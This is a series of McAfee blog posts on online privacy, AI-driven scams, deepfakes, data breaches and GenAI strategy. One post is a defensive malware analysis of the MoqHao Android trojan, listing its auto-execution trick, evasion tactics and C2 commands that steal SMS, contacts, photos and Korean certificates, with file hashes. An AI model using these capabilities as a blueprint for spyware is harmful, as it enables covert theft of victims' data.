In addition to clearing cookie data, users should adjust their browser settings to ensure their online sessions remain private.
Another option is to access the internet in Private Browsing Mode to automatically block third-party tracking, making it a quick and easy option to ensure private browsing. Users can also enable the “do not track” function of their browser to prevent third-party tracking by advertisers and websites. Additionally, you can adjust your browser settings to block pop-up ads and control site permissions, such as access to cameras and locations.
Ad blockers suppress unwanted and potentially malicious ads to ensure a safer browsing experience. Ad blockers can also make it easier to view page layout by removing distracting ads and optimizing page load speed. Additionally, they prevent websites from tracking your information that third parties can sell.
Deploying a security solution like McAfee+ Ultimate ensures the safest internet browsing experience through a holistic approach for threat detection, protection, and remediation. Equipped with a password manager, antivirus software, and firewall protection, users can effectively sidestep online threats while browsing the internet. Moreover, it includes comprehensive privacy and identity protection, such as our Personal Data Cleanup, dark web monitoring, credit monitoring, along with ways you can quickly Lock or freeze your credit file to help prevent accounts from being opened in your name.
Your online behavior can say a lot about you so make sure you safeguard your internet protection. Whether it is through malvertising or invisible forms, hackers can glean information to paint a picture of who you are to target you through deceptive tactics. Cybercriminals are always looking for vulnerabilities which is why assessing your online habits sooner rather than later is a critical first step to smarter online browsing.
The post How to Protect Your Online Privacy appeared first on McAfee Blog.
AI has made the dating scene. In a big way. Nearly one in four Americans say they’ve spiced up their online dating photos and content with artificial intelligence (AI) tools. Yet that might do more harm than good, as 64% of people also said that they wouldn’t trust a love interest who used AI-generated photos in their profiles.
That’s only two of the findings from this year’s Modern Love research. Our second annual study surveyed 7,000 people in seven countries to discover how AI and the internet are changing love and relationships. And it should come as no surprise that AI has ushered in several hefty changes.
In all, we found that mixing love and AI has its ups and downs. For one, people cite how effective AI is. Almost 7 in 10 people said they got more interest and better responses using AI-generated content than their own. However, people also said they didn’t like receiving AI-coded sentiments. Some 57% said they’d be hurt or offended if they found out their Valentine’s message was written by AI.
The tricky part is this — people still find it tough to spot AI content. Only 24% of people said they were sure they could tell if a message or love letter was written by an AI tool like ChatGPT. Still, 42% said they saw fake profiles or photos on dating sites, apps, and social media in the past year.
Moreover, two-thirds of people said that they’re more concerned about phony AI-created content now than they were a year ago. As further findings from McAfee Labs show, those concerns have their roots in reality.
Without question, the rise of powerful AI tools has complicated the online dating landscape. In particular, AI has made it easier for romance scammers to trick people looking for love online. They can ramp up their scams more quickly and with more sophistication than ever before.
In fact, the McAfee Labs team has seen an increase in Valentine’s campaign themes, including malware campaigns, malicious URLs, and a variety of spam and scams. They expect these numbers will continue to rise as February 14 gets closer. Since late January, our Labs team has uncovered that:
These findings fall right in line with what online daters told us. Nearly one-third of Americans said that an online love interest turned out to be a scammer. Another 14% said they discovered an interest was an AI-bot and not a real person.
What’s at stake in these scams? Money, personal info, and sometimes both.
While many romance scammers make initial contact with their victims on dating websites and apps, they quickly move the conversation elsewhere, such as chat apps like WhatsApp and Telegram. In other cases, they move to texts. This gives scammers an advantage, as many dating platforms have fraud detection measures in place. And it’s here where romance scammers commit theft and fraud.
Large, organized crime operations run many romance scams. Moving the conversation from a dating site or app is often a sign that the victim has been “passed along” to a senior scammer who excels at extracting payments and personal info from victims. People shared the top types of info that scammers tried to tease out of them:
In a dating pool filled with an increasing number of scams and AI content, online daters find themselves doing some detective work.
Our study found that 38% of people said they used reverse image search on profile pictures of people they’ve met on social media or dating sites. Another 60% of respondents said they often use social media to dig into the background of their potential partners. As a result:
And rounding out those findings, 11% said they discovered something else entirely — that their potential special person was already in a relationship.
Online dating has always called for a bit of caution. Now with AI hitting the dating scene, it calls for a little skepticism, if not a little detective work. That, in combination with the right tools to protect your privacy, identity, and personal info, can mean the difference between a budding relationship or heartbreak — whether that’s financial, emotional, or both. The following steps can help:
The past year has brought plenty of change to online dating. People now use AI to pepper up their dating profiles and pics, compose love notes, or come up with a few lines for the inside of a card. Likewise, scammers have welcomed AI just as warmly. They use it to fuel content and chats that swindle victims looking for love, backed by sophisticated and large-scale operations that run like a business.
Yet today’s online daters still have what it takes to spot a fake. They have several tools and protections available to them, many powered by AI that can help them steer clear of heartbreak, both the financial and emotional kind. That, along with a mix of healthy skepticism and detective work, they can still date online with confidence, even as AI continues to make its way onto the dating scene.
Survey Methodology
The survey was conducted online between January 2024 by Market Research Company, MSI-ACI via email inviting people 18 years and older to complete an online questionnaire. In total 7,000 adults completed the survey from 7 countries included the United States, United Kingdom, France, Germany, Australia, India, and Japan.
The post Love Bytes – How AI is shaping Modern Love appeared first on McAfee Blog.
Deep fakes are a growing concern in the age of digital media and can be extremely dangerous for school children. Deep fakes are digital images, videos, or audio recordings that have been manipulated to look or sound like someone else. They can be used to spread misinformation, create harassment, and even lead to identity theft. With the prevalence of digital media, it’s important to protect school children from deep fakes.
Educating students on deep fakes is an essential step in protecting them from the dangers of these digital manipulations. Schools should provide students with information about the different types of deep fakes and how to spot them.
Media literacy is an important skill that students should have in order to identify deep fakes and other forms of misinformation. Schools should provide students with resources to help them understand how to evaluate the accuracy of a digital image or video.
Schools should emphasize the importance of digital safety and provide students with resources on how to protect their online identities. This includes teaching students about the risks of sharing personal information online, using strong passwords, and being aware of phishing scams.
Schools should monitor online activity to ensure that students are not exposed to deep fakes or other forms of online harassment. Schools should have policies in place to protect students from online bullying and harassment, and they should take appropriate action if they find any suspicious activity.
By following these tips, schools can help protect their students from the dangers of deep fakes. Educating students on deep fakes, encouraging them to be media literate, promoting digital safety, and monitoring online activity are all important steps to ensure that school children are safe online.
Through quipping students with the tools they need to navigate the online world, schools can also help them learn how to use digital technology responsibly. Through educational resources and programs, schools can teach students the importance of digital citizenship and how to use digital technology ethically and safely. Finally, schools should promote collaboration and communication between parents, students, and school administration to ensure everyone is aware of the risks of deep fakes and other forms of online deception.
Deep fakes have the potential to lead to identity theft, particularly if deep fakes tools are used to steal the identities of students or even teachers. McAfee’s Identity Monitoring Service, as part of McAfee+, monitors the dark web for your personal info, including email, government IDs, credit card and bank account info, and more. We’ll help keep your personal info safe, with early alerts if your data is found on the dark web, so you can take action to secure your accounts before they’re used for identity theft.
The post How to Protect School Children From Deep Fakes appeared first on McAfee Blog.
With the rise of artificial intelligence (AI) and machine learning, concerns about the privacy of personal data have reached an all-time high. Generative AI is a type of AI that can generate new data from existing data, such as images, videos, and text. This technology can be used for a variety of purposes, from facial recognition to creating “deepfakes” and manipulating public opinion. As a result, it’s important to be aware of the potential risks that generative AI poses to your privacy.
In this blog post, we’ll discuss how to protect your privacy from generative AI.
Generative AI is a type of AI that uses existing data to generate new data. It’s usually used for things like facial recognition, speech recognition, and image and video generation. This technology can be used for both good and bad purposes, so it’s important to understand how it works and the potential risks it poses to your privacy.
Generative AI can be used to create deepfakes, which are fake images or videos that are generated using existing data. This technology can be used for malicious purposes, such as manipulating public opinion, identity theft, and spreading false information. It’s important to be aware of the potential risks that generative AI poses to your privacy.
Generative AI uses existing data to generate new data, so it’s important to be aware of what data you’re sharing online. Be sure to only share data that you’re comfortable with and be sure to use strong passwords and two-factor authentication whenever possible.
There are a number of privacy-focused tools available that can help protect your data from generative AI. These include tools like privacy-focused browsers, VPNs, and encryption tools. It’s important to understand how these tools work and how they can help protect your data.
It’s important to stay up-to-date on the latest developments in generative AI and privacy. Follow trusted news sources and keep an eye out for changes in the law that could affect your privacy.
By following these tips, you can help protect your privacy from generative AI. It’s important to be aware of the potential risks that this technology poses and to take steps to protect yourself and your data.
Of course, the most important step is to be aware and informed. Research and organizations that are using generative AI and make sure you understand how they use your data. Be sure to read the terms and conditions of any contracts you sign and be aware of any third parties that may have access to your data. Additionally, be sure to look out for notifications of changes in privacy policies and take the time to understand any changes that could affect you.
Finally, make sure to regularly check your accounts and reports to make sure that your data is not being used without your consent. You can also take the extra step of making use of the security and privacy features available on your device. Taking the time to understand which settings are available, as well as what data is being collected and used, can help you protect your privacy and keep your data safe.
This blog post was co-written with artificial intelligence (AI) as a tool to supplement, enhance, and make suggestions. While AI may assist in the creative and editing process, the thoughts, ideas, opinions, and the finished product are entirely human and original to their author. We strive to ensure accuracy and relevance, but please be aware that AI-generated content may not always fully represent the intent or expertise of human-authored material.
The post How to Protect Your Privacy From Generative AI appeared first on McAfee Blog.
AI scams are becoming increasingly common. With the rise of artificial intelligence and technology, fraudulent activity is becoming more sophisticated and sophisticated. As a result, it is becoming increasingly important for families to be aware of the dangers posed by AI scams and to take steps to protect themselves.
By taking these steps, you can help protect your family from AI scams. Educating yourself and your family about the potential risks of AI scams, monitoring your family’s online activity, using strong passwords, installing anti-virus software, and checking your credit report regularly can help keep your family safe from AI scams.
No one likes to be taken advantage of or scammed. By being aware of the potential risks of AI scams, you protect your family from becoming victims.
In addition, it is important to be aware of emails or texts that appear to be from legitimate sources but are actually attempts to entice you to click on suspicious links or provide personal information. If you receive a suspicious email or text, delete it immediately. If you are unsure, contact the company directly to verify that the message is legitimate. By being aware of potential AI scams keep your family safe from financial loss or identity theft.
You can also take additional steps to protect yourself and your family from AI scams. Consider using two-factor authentication when logging in to websites or apps, and keep all passwords and usernames secure. Be skeptical of unsolicited emails or texts never provide confidential information unless you are sure you know who you are dealing with. Finally, always consider the source and research any unfamiliar company or service before you provide any personal information. By taking these steps, you can help to protect yourself and your family from the dangers posed by AI scams.
monitor your bank accounts and credit reports to ensure that no unauthorized activity is taking place. Set up notifications to alert you of any changes or suspicious activity. Make sure to update your security software to the latest version and be aware of phishing attempts, which could be attempts to gain access to your personal information. If you receive a suspicious email or text, do not click on any links and delete the message immediately.
Finally, stay informed and know the signs of scam. Be your online accounts and look out for any requests for personal information. If something looks suspicious, trust your instincts and don’t provide any information. Report any suspicious activity to the authorities and make sure to spread the word to others from falling victim to AI scams.
This blog post was co-written with artifical intelligence (AI) as a tool to supplement, enhance, and make suggestions. While AI may assist in the creative and editing process, the thoughts, ideas, opinions, and the finished product are entirely human and original to their author. We strive to ensure accuracy and relevance, but please be aware that AI-generated content may not always fully represent the intent or expertise of human-authored material.
The post How to Protect Your Family From AI Scams appeared first on McAfee Blog.
Two massive data breaches in France have impacted roughly half the nation’s population. The data of an estimated 33 million people has been compromised, making this the country’s largest-ever data breach.
Attackers targeted two French healthcare payment service providers, Viamedis and Almerys. Both companies manage third-party payments for health insurance in France. According to the CNIL, (Commission nationale de l’informatique et des libertés) France’s data protection agency, data was compromised during two separate breaches that struck in early February.
From a statement issued by the CNIL, affected records of policyholders and their families include:
The CNIL further stated that data such as banking info, medical data, health reimbursements, postal details, telephone numbers, and emails were not swept up by the breaches.
The concern with this breach, as with any other, is how this breached info might get combined with info from other breaches. Taken together, bad actors might use that combined info to conduct follow-on attacks, including identity theft.
As such, the CNIL suggests the following for policyholders:
In the meantime, the CNIL stated that it’s investigating the attack further, particularly to determine whether the security measures in place were in line with European data standards and obligations.
Any time a data breach occurs, it means that your personal info might end up in the hands of a bad actor. In light of this, there are a few steps you can take to protect yourself in the aftermath of a data breach, which involves a combination of preventative steps and some monitoring on your part.
Report unauthorized use of your info or accounts immediately.
As noted by the CNIL, keep an eye on your account. If you note any unusual activity, notify Viamedis or Almerys immediately.
Keep an eye out for phishing attacks.
With some personal info in hand, bad actors might seek out more. They might follow up a breach with rounds of phishing attacks that direct you to bogus sites designed to steal your personal info. So it’s always wise to keep a skeptical eye open for unsolicited messages that ask you for info, often in ways that urge or pressure you into acting. Always look out for phishing attacks, particularly after breaches.
With that, you can look into McAfee Scam Protection. It uses AI that detects suspicous links in email, texts, and social media messages. Further, it can block risky sites if you accidentally click or tap a link.
Change your passwords and use a password manager.
While it doesn’t appear that login info was affected, a password update is still a strong security move. Strong and unique passwords are best, which means never reusing your passwords across different sites and platforms. Using a password manager will help you keep on top of it all, while also storing your passwords securely. Moreover, changing your passwords regularly might make a stolen password worthless because it’s out of date.
Enable two-factor authentication.
While a strong and unique password is a good first line of defense, enabling two-factor authentication across your accounts will help your cause by providing an added layer of security. It’s increasingly common to see nowadays, where banks and all manner of online services only allow access to your accounts after you’ve provided a one-time passcode sent to your email or smartphone. If your accounts support two-factor authentication, enable it.
Consider using identity monitoring.
Breached and stolen info often ends up in dark web marketplaces where hackers, scammers, and thieves purchase it to commit yet more crime. Once it was difficult to know if your info was caught up in such marketplaces, yet now an Identity Monitoring service can do the detective work for you.
McAfee’s service monitors the dark web for your personal info, including email, government IDs, health IDs, credit card and bank account info, and more. This can help keep your personal info safe with early alerts that show you if your data is found on the dark web, an average of 10 months ahead of similar services. From there, you’ll get guidance that you can act on, which can help protect your info and accounts from potential theft.
We also offer identity restoration services through our McAfee+ Ultimate subscriptions. Identity restoration includes access to experts who can help generate an effective and efficient plan to quickly restore your identity, so you don’t have to tackle the issue by yourself.
Consider using comprehensive online protection.
A complete suite of online protection software can offer layers of extra security. It offers you the tools and services listed above, along with further features that can protect you online. That includes a VPN to keep your time online more private from online data collection while protecting it from thieves who’re out to steal credit card and account info. It also includes web browsing protection that can warn you of sketchy websites and malicious downloads that look to steal your info. In all, it’s thorough protection for your devices, privacy, and identity. And in a time of data breaches, that kind of protection has become essential.
Whether you’re a French citizen or not, word of this data breach offers an opportunity to bolster your defenses. Major breaches like these occur, just as we saw with the Facebook breach in 2021, the PayPal breach in 2023, and the 23andMe breach, also in 2023. Taking preventative steps now can put you a step ahead of the next one.
Of those steps, using comprehensive online protection software is the strongest. Protection like ours safeguards your privacy, identity, and devices in breadth and depth — protecting you from data breaches and all manner of scams and attacks that often follow them.
The post France Gets Hit with Its Largest Data Breach Ever — What You Need to Know appeared first on McAfee Blog.
Social media is part of our social fabric. So much so that over 56% of the global population are social media users to some degree or other. With all that sharing, conversing, and information passing between family and friends, social media can be a distinct digital extension of ourselves—making it important to know how you can protect your social media accounts from hacks and attacks.
Beyond the sheer number of people who’re on social media, there’s also the amount of time we spend on it. People worldwide spend an average of 147 minutes a day on social media. With users in the U.S. spending just over two hours on social media a day and users in the Philippines spending nearly four hours a day, that figure can vary widely. Yet it’s safe to say that a good portion of our day features time scrolling and thumbing through our social media feeds.
Given how much we enjoy and rely on social media, now’s a fine time to give your social media settings and habits a closer look so that you can get the most out of it with less fuss and worry. Whether you’re using Facebook, Instagram, TikTok, or whatnot, here are several things you can do that can help keep you safe and secure out there:
Passwords mark square one in your protection, with strong and unique passwords across all your accounts forming primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task—thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software will include one.
Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy.
Be critical of the invitations you receive. Out-and-out strangers could be more than just a stranger, they could be a fake account designed to gather information on users for purposes of cybercrime, or they can be an account designed to spread false information. There are plenty of them too. In fact, in Q3 of 2021 alone, Facebook took action on 1.8 billion fake accounts. Reject such requests.
Nothing says “there’s nobody at home right now” like that post of you on vacation or sharing your location while you’re out on the town. In effect, such posts announce your whereabouts to a broad audience of followers (even a global audience, if you’re not posting privately, as called out above). Consider sharing photos and stories of your adventures once you’ve returned.
It’s a famous saying for a reason. Whether your profile is set to private or if you are using an app with “disappearing” messages and posts (like Snapchat), what you post can indeed be saved and shared again. It’s as simple as taking a screenshot. If you don’t want it out there, forever or otherwise, simply don’t post it.
We’re increasingly accustomed to the warnings about phishing emails, yet phishing attacks happen plenty on social media. The same rules apply. Don’t follow any links you get from strangers by way of instant or direct messengers. And keep your personal information close. Don’t pass out your email, address, or other info as well. Even those so-called “quiz” posts and websites can be ruses designed to steal bits and pieces of personal info that can be used as the basis of an attack.
Sadly, social media can also be a place where people pull a fast one. Get-rich-quick schemes, romance cons, and all kinds of imposters can set up shop in ads, posts, and even direct messages—typically designed to separate you from your personal information, money, or both. This is an entire topic to itself, and you can learn plenty more about quizzes and other identity theft scams to avoid on social media.
Some platforms such as Facebook allow users to review posts that are tagged with their profile names. Check your account settings and give yourself the highest degree of control over how and where your tags are used by others. This will help keep you aware of where you’re being mentioned by others and in what way.
Security software can protect you from clicking on malicious links while on social media while steering you clear of other threats like viruses, ransomware, and phishing attacks. It can look out for you as well, by protecting your privacy and monitoring your email, SSN, bank accounts, credit cards, and other personal information. With identity theft a rather commonplace occurrence today, security software is really a must.
Now you can point to a number that shows you just how safe you are with our Protection Score. It’s an industry first, and it works by taking stock of your overall security and grading it on a scale of 0 to 1,000. From there, it calls out any weak spots and then walks you through the steps to shore it up with personalized guidance. This way, you’re always in the know about your security, privacy, and personal identity on social media and practically wherever else your travels take you online.
The post How to Protect Your Social Media Accounts appeared first on McAfee Blog.
Authored by Dexter Shin
MoqHao is a well-known Android malware family associated with the Roaming Mantis threat actor group first discovered in 2015. McAfee Mobile Research Team has also posted several articles related to this malware family that traditionally targets Asian countries such as Korea and Japan.
Recently McAfee Mobile Research Team found that MoqHao began distributing variants using very dangerous technique. Basically, the distribution method is the same. They send a link to download the malicious app via the SMS message. Typical MoqHao requires users to install and launch the app to get their desired purpose, but this new variant requires no execution. While the app is installed, their malicious activity starts automatically. This technique was introduced in a previous post but the difference is that this dangerous technique is now being abused by other well-known active malware campaigns like MoqHao. We have already reported this technique to Google and they are already working on the implementation of mitigations to prevent this type of auto-execution in a future Android version. Android users are currently protected by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play. McAfee Mobile Security detects this threat as Android/MoqHao.
MoqHao is distributed via phishing SMS messages (also known as Smishing). When a user receives an SMS message containing a malicious link and clicks it, the device downloads the malicious application. Phishing messages are almost the same as in previous campaigns:
Figure 1. Smishing message impersonating a notification from a courier service.
One noticeable change is that they now use URL shortener services. If the malware authors use their own domain, it can be quickly blocked but if they use legitimate URL shortener services, it is difficult to block the short domain because it could affect all the URLs used by that service. When a user clicks on the link in the message, it will be redirected to the actual malicious site by the URL shortener service.
As mentioned at the beginning, this variant behaves differently from previous ones. Typical MoqHao must be launched manually by the user after it is installed but this variant launches automatically after installation without user interaction:
Figure 2. Differences between typical MoqHao and Modern MoqHao
We explained this auto-execution technique in detail in a previous post but to briefly summarize it here, Android is designed so when an app is installed and a specific value used by the app is set to be unique, the code runs to check whether the value is unique upon installation. This feature is the one that is being abused by the highly active Trojan family MoqHao to auto-execute itself without user interaction. The distribution, installation, and auto-execution of this recent MoqHao variant can be seen in the following video:
On the other hand, this recent MoqHao variant uses Unicode strings in app names differently than before. This technique makes some characters appear bold, but users visually recognize it as “Chrome”. This may affect app name-based detection techniques that compare app name (Chrome) and package name (com.android.chrome):
Figure 3. App name using Unicode strings.
Additionally, they also use social engineering techniques to set malicious apps as the default SMS app. Before the settings window appears, they show a message telling you to set up the app to prevent spam, but this message is fake:
Figure 4. Fake message using social engineering techniques.
Also, the different languages used in the text associated with this behavior suggests that, in addition to Japan, they are also targeting South Korea, France, Germany, and India:
Figure 5. Fake messages designed to target different countries.
After the initialization of the malware is completed, it will create a notification channel that will be used to display phishing messages:
Figure 6. Create a notification channel for the next phishing attack.
The malware checks the device’s carrier and uses this notification to send phishing messages accordingly to trick users into clicking on them. MoqHao gets the phishing message and the phishing URL from Pinterest profiles.
Figure 7. Phishing message and URL in Pinterest profile
If the phishing string is empty, MoqHao will use the phishing message in the code:
Figure 8. Phishing notification code for each carrier
This variant also connects to the C2 server via WebSocket. However, it has been confirmed that several other commands have been added in addition to the commands introduced in the previous post:
| Command | Description |
| getSmsKW | Send all SMS messages to C2 server |
| sendSms | Send SMS messages to someone |
| setWifi | Enable/disable Wifi |
| gcont | Send whole contacts to C2 server |
| lock | Store Boolean value in “lock” key in SharedPreferences |
| bc | Check SIM state |
| setForward | Store String value in “fs” key in SharedPreferences |
| getForward | Get String value in “fs” key in SharedPreferences |
| hasPkg | Check specific package installed on device |
| setRingerMode | Set Sound/Vibrate/Silent mode |
| setRecEnable | Set Vibrate/Silent mode according to SDK version |
| reqState | Send device information (Network, Power, MAC, Permission) to C2 server |
| showHome | Emulate Home button click |
| getnpki | Send Korean Public Certificate (NPKI) to C2 server |
| http | Send HTTP requests |
| call | Call a specific number with Silent mode |
| get_apps | Get list of installed packages |
| ping | Check C2 server status |
| getPhoneState | Get unique information such as IMEI, SIM number, Android ID, and serial number |
| get_photo | Send all photos to C2 server |
MoqHao malware family is an active malware that has been around for years. Although many years have passed, they are using more and more different ways to hide and reach users. We are seeing a much higher number of C2 commands than in previous, the active use of legitimate sites like Pinterest to store and update phishing data, and code with the potential to target Asian countries like Japan and South Korea, as well as countries like France, Germany, and India. Moreover, we expect this new variant to be highly impactful because it infects devices simply by being installed without execution.
It is difficult for general users to find fake apps using legitimate icons and application names, so we recommend users to install secure software to protect their devices. For more information, visit McAfee Mobile Security.
| SHA256 | Application Name | Package Name |
| 2576a166d3b18eafc2e35a7de3e5549419d10ce62e0eeb24bad5a1daaa257528 | chrome | gb.pi.xcxr.xd |
| 61b4cca67762a4cf31209056ea17b6fb212e175ca330015d804122ee6481688e | chrome | malmkb.zdbd.ivakf.lrhrgf |
| b044804cf731cd7dd79000b7c6abce7b642402b275c1eb25712607fc1e5e3d2b | chrome | vfqhqd.msk.xux.njs |
| bf102125a6fca5e96aed855b45bbed9aa0bc964198ce207f2e63a71487ad793a | chrome | hohoj.vlcwu.lm.ext |
| e72f46f15e50ce7cee5c4c0c5a5277e8be4bb3dd23d08ea79e1deacb8f004136 | chrome | enech.hg.rrfy.wrlpp |
| f6323f8d8cfa4b5053c65f8c1862a8e6844b35b260f61735b3cf8d19990fef42 | chrome | gqjoyp.cixq.zbh.llr |
The post MoqHao evolution: New variants start automatically right after installation appeared first on McAfee Blog.
The explosive growth of Generative AI has sparked many questions and considerations not just within tech circles, but in mainstream society in general. Both the advancement of the technology, and the easy access means that virtually anyone can leverage these tools, and much of 2023 was spent discovering new ways that Generative AI could be used to solve problems or better our lives.
However, in the rush to apply this transformative technology, we should also keep in mind “Maslow’s Hammer.” Attributed to Abraham Maslow, best known for outlining a hierarchy of needs, Maslow’s Hammer highlights an over-reliance on a single tool, a concept popularly summarized as “If all you have is a hammer, everything looks like a nail.” As corporations navigate the continuing evolution of AI, we need to be certain that we’re applying it where it makes the most sense, and not just because we can. This will ultimately save time, money, and energy that can be applied to building robust tools and solutions for viable use cases.
Recognizing when to use GenAI and when not to use it is a necessary skill set for full-stack domain-specific data scientists, engineers, and executives.
Running GenAI is expensive and not without tradeoffs. As of today, careless planning of a GenAI application can lead to a negative return on investment (due to the excessive operational cost), scalability and downtime issues (due to limited computing resources), and serious damage to the customer experience and brand reputation (due to the potential generation of improper content, hallucinations, mis/disinformation, misleading advice, etc.). Organizations struggle to control these variables in general, and the negative impacts and limitations must be offset by a huge value proposition.
One interesting aspect that can be observed across industries is the unexpected (but welcomed) side effects of going through the GenAI voyage, as some sort of eye-opening epiphany. How do we balance this risk/reward? What should we be looking at and what are the questions we should be asking to ensure that we’re successfully applying (or not) AI?
Breaking free from the complexity bias: as humans, we tend to favor and give credit to complex solutions only (known as ‘complexity bias’). Unfortunately, this particularly applies to GenAI applications nowadays, as we are influenced and “self-forced” to use GenAI to solve all problems. Just because “it seems to work”, it doesn’t mean it’s the best/optimal solution. It is by following this logic that some teams may have a significant chance of discovering that there are simpler (probably non-GenAI) means of solving some of these real-world problems (or parts of the problem!). Achieving this revelation requires a humble mind that is open to the possibility of considering that we don’t always need the most complex or expensive solution, even if it’s fancy and we can afford it.
It’s not always all or nothing: one aspect that works only for a few companies but not for most is the need to run GenAI all the time. If your business case is not around selling or supporting GenAI infrastructure, then you are likely using GenAI as a tool to accomplish domain-specific goals. If so, what every player in the industry would want is to maximize value while minimizing operational costs. At the current cost of running GenAI, the most obvious answer to achieve that is to avoid running it as much as possible, while still delivering most of the desired value. This delicate trade-off is a smart and elegant way of tackling the problem: not dismissing the value provided by GenAI nor obsessively using it up to the point that yields negative ROI. How do you achieve this? That’s likely the secret sauce of your domain-specific application area.
Ethical downsizing: GenAI models can be (and usually are) quite big. While this might be required for a few scenarios, it’s not necessary for most real-world domain-specific applications, as several GenAI authors are finding out across the industry (e.g., Phi-2). As such, it’s not only important for your business but also for humanity that we learn to downsize and optimize GenAI models as much as possible. It not only brings efficiency to your use case (cost saving, inference speed, lighter footprint, reduced risk, etc.) but also accomplishes a responsible use of the technology that is respectful of human resources. Each time you save a kilowatt or a few seconds of inference per user, you are explicitly contributing to a sustainable future where GenAI is leveraged to maximize value while minimizing environmental impact, and that’s something to be proud of.
Cross the stream where it is shallowest…
The key is to be humble enough to seek the optimal path: keep an open mind to consider non-GenAI solutions to your problems first. If GenAI is truly the best way to go, then find out if you really need to run it all the time or just sometimes. And finally, downsize as much as possible, not just because of cost and speed, but because of social responsibility.
GenAI is clearly having a moment with demonstrated potential. At the same time, being able to recognize the technical and financial downsides of GenAI is as important for the healthy development of the industry. In the same way we don’t use the hammer for every task at home, we should continuously ask: Is this problem worth GenAI? And is the value provided by this technology (when applied to my domain-specific use case) going to exceed the operational shortcomings? It is with this mindset that the industry will make significant and responsible progress in solving problems with a diverse but efficient set of tools. Let’s continue exploring and building the fascinating world of GenAI, without forgetting what our ultimate goals are.
The post Generative AI: Cross the Stream Where it is Shallowest appeared first on McAfee Blog.
On Safer Internet Day, we ask an important question: how can you tell what’s real and what’s fake online?
There’s plenty of fakery out there, due in large part to AI-generated content. And spotting the difference takes a bit of work nowadays.
Taylor Swift showed us why back in January. More accurately, a Taylor Swift AI voice clone showed us why. Scammers combined old footage of Swift with phony AI-cloned audio that touted a free cookware giveaway. They went about it in a cagey way, using the Le Creuset brand as bait, a brand that her fans know she loves.
Of course, all people had to do was “answer a few questions” to get their “free” cookware. When some did, they wound up with stolen personal info. It’s one of many full-on identity theft scams with a bogus celebrity AI twist.
Of course, this wasn’t the first time that scammers used AI to trick well-meaning people. Last December saw AI voice-cloning tools mimic singer Kelly Clarksoni to sell weight-loss gummies. Over the summer, scammers posted other ads using the synthesized voice of Elon Muskii.
Meanwhile, more quietly yet no less damaging, we’ve seen a glut of AI-generated fakes flood our screens. They look more convincing than ever, as bad actors use AI tools to spin up fake videos, emails, texts, and images. They do it quickly and on the cheap, yet this fake content still has a polish to it. Much of it lacks the telltale signs of a fake, like poor spelling, grammar, and design.
Another example of AI-generated fake content comes from a BBC report on disinformation being fed to young studentsiii. In it, they investigated several YouTube channels that use AI to make videos. The creators of these channels billed them as educational content for children, yet the investigators found them packed with falsehoods and flat-out conspiracy theories.
This BBC report offers a prime example of deliberate disinformation, produced on a vast scale, passing itself off as the truth. It’s also one more example of how bad actors use AI, not for scams, but for spreading outright lies.
Amid all these scams and disinformation floating around, going online can feel like playing a game of “true or false.” Quietly, and sometimes not so quietly, we find ourselves asking, “Is what I’m seeing and hearing real?”
AI has made answering that question tougher, for sure. Yet that’s changing. In fact, we’re now using AI to spot AI. As security professionals, we can use AI to help sniff out what’s real and what’s fake. Like a lie detector.
We showcased that exact technology at the big CES tech show in Las Vegas earlier this year. Our own Project Mockingbird, which spots AI-generated voices with better than 90% accuracy. Here’s a look at it in action when we ran it against the Taylor Swift scam video. As the red lines spike, that’s our AI technology calling out what’s fake …
In addition to AI audio detection, we’re working on technology for image detection, video detection, and text detection as well — tools that will help us tell what’s real and what’s fake. It’s good to know technology like this is on the horizon.
Yet above and beyond technology, there’s you. Your own ability to spot a fake. You have a lie detector of your own built right in.
Like Ferris Bueller said in the movies years ago, “Life moves pretty fast …” and that’s true of the internet too. The speed of life online and the nature of our otherwise very busy days make it tough to spot fakes. We’re in a rush, and we don’t always stop and think if what we’re seeing and hearing is real. Yet that’s what it takes. Stopping, and asking a few quick questions.
As put forward by Common Sense Media, a handful of questions can help you sniff out what’s likely real and what’s likely false. As you read articles, watch videos, and so forth, you can ask yourself:
Answering only a few of them can help you spot a scam. Or at least get a sense that a scam might be afoot. Let’s use the Taylor Swift video as an example. Asking just three questions tells you a lot.
First, “what important info is left out?”
The video mentions a “packaging error.” Really? What kind of error? And why would it lead Le Creuset to give away thousands and thousands of dollars worth of their cookware? Companies have ways of correcting errors like these. So, that seems suspicious.
Second, “is this credible?”
This one gets a little tricky. Yet, watch the video closely. That first clip of Swift looks like a much younger Swift compared to the other shots used later. We’re seeing Taylor Swift from her different “eras” throughout, stitched together in a slapdash way. With that, note how quick the cuts are. Likely the scammers wanted to hide the poor lip-synching job they did. That seems yet more suspicious.
Lastly, “who paid for this content?”
OK, let’s say Le Creuset really did make a “packaging error.” Would they really put the time, effort, and money into an ad that features Taylor Swift? That would most certainly heap even more losses on those 3,000 “mispackaged” pieces of cookware. It doesn’t make sense.
While these questions didn’t give definitive answers, they certainly raised several red flags. Everything about this sounds like a scam, thanks to asking a few quick questions and running the answers through your own internal lie detector.
So, how you can tell what’s real and what’s fake online? In the time of AI, it’ll get easier as new technologies that detect fakes roll out. Yet as it is with staying safe online, the other part of knowing what’s true and false is you.
Hopping online today calls for a critical eye more now than ever. Bad actors can cook up content with AI at rates unseen until now. And they create it to strike a nerve. To lure you into a scam or to sway your thinking with disinformation. With that, content that riles you up, catches you by surprise, or that excites you into action is content that you should pause and think about.
Asking a few questions can help you spot a fake or give you a sense that something about that content isn’t quite right, both of which can keep you safer online.
The post Safer Internet Day: Telling What’s Real from What’s Fake Online appeared first on McAfee Blog.
As voters in the recent New Hampshire primary have found, a fake robocall of President Joe Biden has been making the rounds. Using AI voice-cloning technologies, the bogus message urges Democratic voters to stay home and “… save your vote for the November election.”
The phony message further went on to say, “Your vote makes a difference in November, not this Tuesday.”
NBC News first reported the storyi, and the New Hampshire Attorney General’s office has since launched an investigation into what it calls an apparent “unlawful attempt to disrupt the New Hampshire Presidential Primary Election and to suppress New Hampshire votersii.”
This is just one of the many AI voice-clone attacks we’ll see this year. Not only in the U.S., but worldwide, as crucial elections are held around the globe.
